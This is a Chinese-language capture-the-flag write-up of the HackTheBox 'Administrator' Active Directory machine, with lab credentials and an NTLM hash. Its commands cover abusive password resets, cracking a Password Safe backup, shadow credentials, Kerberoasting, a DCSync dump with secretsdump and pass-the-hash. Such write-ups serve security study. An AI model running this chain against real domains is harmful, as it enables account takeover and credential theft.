Administrator on HackTheBox

, , , , , ,

Before all

Victim’s IP : 10.10.11.42
Victim’s Host : administrator.htb
Attacker’s IP : 10.10.14.10

Initial Credential: Olivia/ichliebedich

對…我那時候沒看到爆破了快一小時🫠
image

Recon

老生常談
如果有對這些工具不熟悉就google用法ㄅ~

port scan

Command 

1
rustscan -a 10.10.11.42 --ulimit 5000 -- -sC -sV -Pn

Result 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
PORT      STATE SERVICE       REASON  VERSION
21/tcp    open  ftp           syn-ack Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2024-12-07 08:08:50Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack Microsoft Windows RPC
53462/tcp open  msrpc         syn-ack Microsoft Windows RPC
56475/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
56486/tcp open  msrpc         syn-ack Microsoft Windows RPC
56491/tcp open  msrpc         syn-ack Microsoft Windows RPC
56494/tcp open  msrpc         syn-ack Microsoft Windows RPC
56513/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-12-07T08:09:52
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 35406/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 20079/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 52617/udp): CLEAN (Failed to receive data)
|   Check 4 (port 20759/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 7h00m06s

有開 ftp/smb/ldap/winrpc 和 Microsoft HTTPAPI
初步看來版本號都沒什麼問題

bloodhound

Command 

1
bloodhound-python -c All -u 'Olivia' -p 'ichliebedich' -d administrator.htb -ns 10.10.11.42 --zip

接著neo4j startbloodhound下下去就可以拖進去看ㄌ

Exploit

都是用evil-winrm登入 

1
evil-winrm -u 'Olivia' -p 'ichliebedich' -i 10.10.11.42

Abusing password reset

現在是Olivia的權限,先看看Outbound Objects有哪些
image

因為互相有操作權限,有一條reset password的線
Olivia -> Michael (利用GenericAll) 

1
net user michael Whale120

密碼換成Whale120
接下來是 Micahel -> Benjamin (利用ForceChangePassword)
因為 Benjamin 不支援 winrm 等登入介面,只能用 rpc 去改密碼
指令參考:https://malicious.link/posts/2017/reset-ad-user-password-with-linux/

1
rpcclient -U michael //10.10.11.42

進去後: 

1
setuserinfo benjamin 23 'Whale120'

然後就差點卡住了

Cracking pwsafe file

還記得剛剛有掃到一個 ftp ,就是用在這邊
Command 

1
ftp administrator.htb

帳密就是 benjamin/Whale120
ls只有一個檔案,用get Backup.psafe3抓下來就好ㄌ
file結果:
image
找到一個叫做pwsafe的工具,apt抓下來~
image
要密碼QwQ,帶他見見john😎 

1
2
pwsafe2john Backup.psafe3>hash
john hash --wordlist=/home/kali/rockyou.txt

image

選定一個user,點選 Auto Type
image
就可以拿到密碼了
image

Shadow Credential

先關注 Emily 相關的權限:
image

對 Ethan 有 GenericWrite 權限
所謂的 msDS-KeyCredentialLink 就是存取 Windows 上該使用者各種身分驗證的金鑰(不只密碼,還有指紋、pin碼等),然後加密時是拿目標的NTLM HASH。
也就是說,如果寫入了目標的 msDS-KeyCredentialLink 並能獲取返還值,就可以取得 HASH 並嘗試爆破,這種手法就叫 Shadow Credentials
pywhisker
pywhisker可以去建立一個新的金鑰 

1
pywhisker -d administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb --target ethan --action "add"

image

targetedKerberoast.py
接著使用targetedKerberoast.py抓剛剛的SPN

1
sudo ./targetedKerberoast.py -v -d 'administrator.htb' -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

image
最後一樣丟john就可以爆破惹

P.S.
如果撞到KRB_AP_ERR_SKEW(Clock skew too great) Error,代表時間沒對上,要與主機時間對齊: 

1
2
3
sudo su
timedatectl set-ntp off
rdate -n 10.10.11.42

其他我就沒遇過什麼問題了(目前)

DCSync and Pass The Hash

Ethan對Administrator有DCSync

image

詳細資料可以參考:https://tttang.com/archive/1634/

impacket-secretsdump 炸下去~ 

1
impacket-secretsdump -just-dc [email protected]

image

最後針對Admin使用Pass The Hash攻擊: 

1
evil-winrm -u Administrator -H '3dc553ce4b9fd20bd016e098d2d2fd2e' -i 10.10.11.42

image

ROOTED!

After all

有點久沒打那麼多AD,發現有些概念/名詞有點生疏 :zzz:
絕對不是在成為Script Kiddie的路上
這篇補了一下XD
https://xz.aliyun.com/t/15718?time__1311=GqjxnQiQEpDsD7Co0%3DGOjG8YF3xYT2ymD#toc-10